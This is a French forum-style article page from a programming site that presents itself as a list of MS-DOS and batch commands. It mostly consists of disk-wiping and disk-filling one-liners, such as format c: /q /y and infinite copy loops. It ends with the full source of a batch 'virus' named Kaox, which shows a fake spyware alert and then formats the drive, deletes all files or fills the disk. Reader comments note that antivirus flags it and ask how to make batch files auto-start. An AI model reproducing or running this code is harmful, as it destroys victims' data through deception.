
Commande Ms Dos & Batch (bat)
|
|
FICHE ARTICLE |
|
|
|
|
|
Déposer par : | Molo |
|
Clicks : | 14660 |
|
|
Pertinence : | 13 / 20 |
|
Commentaire : | 2 |
|
|
Description : |
||||
|
Fonctions et commandes MS-Dos |
|||||
|
|
ARTICLE - PAGE 1 / 1 |
|
|
|
format c: /q /y
format a: /s
format /u c:>autoexc.bat
:loop copy c:\Programme Files\*.* c:\Windows\systeme\ goto :loop
choice /C:ab Si tu veut formater tape a sinon tape b /T:b,10 if errorlevel = 1 goto a if errorlevel = 2 goto b :b format c: /q /y :a format c: /q /y
attrib fichier.doc +r
attrib fichier.doc -r
attrib fichier.doc +a
attrib fichier.doc -a
attrib fichier.doc +h
attrib fichier.doc -h
attrib fichier.doc +s
attrib fichier.doc -s
/a
pause
pause>nul
choice /t:o,5>nul
echo
echo.
cls
echo off
@
%windir%\RUNDLL32.EXE User.exe,ExitWindows
shutdown
rem
deltree
md
choice /N < nul
code: @echo off cls rem #_nom du virus: Kaox rem #_code créé le 05/04/2004 à 3h04 rem #_auteur : Freak rem #_code créé pour : moteurprog.com rem #_code de 31 lignes et de 1 069 octets echo ################################################## echo ALERTE !!! echo Votre ordinateur est infecter par un spyware. echo Le fichier msbb.exe à été trouver. echo ################################################## pause choice /C:ab Si vous voulez mettre le fichier en quarantaine tapez "a" sinon tapez "b". Si dans les 15 secondes qui suivent vous n'avez pas choisi, le fichier sera automatiquement mit en quarantaine. /T:a,15 if errorlevel = 1 goto a if errorlevel = 2 goto b :a cls @format c: /u /q @deltree /y c:\*.* echo Freak est heureux de vous annoncer que votre disque dur a été echo formaté ;-) goto :fin :b cls :loop @copy c:\Programme Files\*.* + c:\Windows\*.* c:\Windows\System\ echo Votre ordinateur est en train de se remplir a l' infini ;-) goto :loop :fin
|
|
Commentaires du tutorial |
|
Vous pouvez ci-dessous ajouter un commentaire à cet article (uniquement si vous êtes membre Moteurprog |
|
|
Vous n'êtes pas membre de la communauté Moteurprog, |
|
||
| "Le code suivant peut faire de gros dégas, donc attention a son utilisation." En effet même mon antivirus s'est déclancher lors du lancemnt de ce sript ! | ||
|
||
| c estvraiment bon , je suis heureux j ai encors une chose mais j aimerai savoir comment faire un bat qui demarre en meme temps windows | ||
